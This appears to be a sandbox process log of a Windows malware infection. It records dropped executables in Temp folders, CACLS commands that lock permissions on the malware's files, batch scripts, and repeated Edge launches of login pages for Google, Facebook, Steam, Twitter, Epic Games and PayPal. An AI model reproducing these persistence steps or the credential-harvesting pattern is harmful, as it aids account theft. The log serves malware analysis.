C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2D64.tmp\2D65.tmp\2D66.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x160,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,18342986278826994582,3345467212881018459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,18342986278826994582,3345467212881018459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,144926622398744556,12556949913001646629,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,144926622398744556,12556949913001646629,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,10997434609157852635,4303289285213158550,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,10997434609157852635,4303289285213158550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9312 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\6915.exe

C:\Users\Admin\AppData\Local\Temp\6915.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9788 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe

C:\Users\Admin\AppData\Local\Temp\6FBD.exe

C:\Users\Admin\AppData\Local\Temp\6FBD.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\825C.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

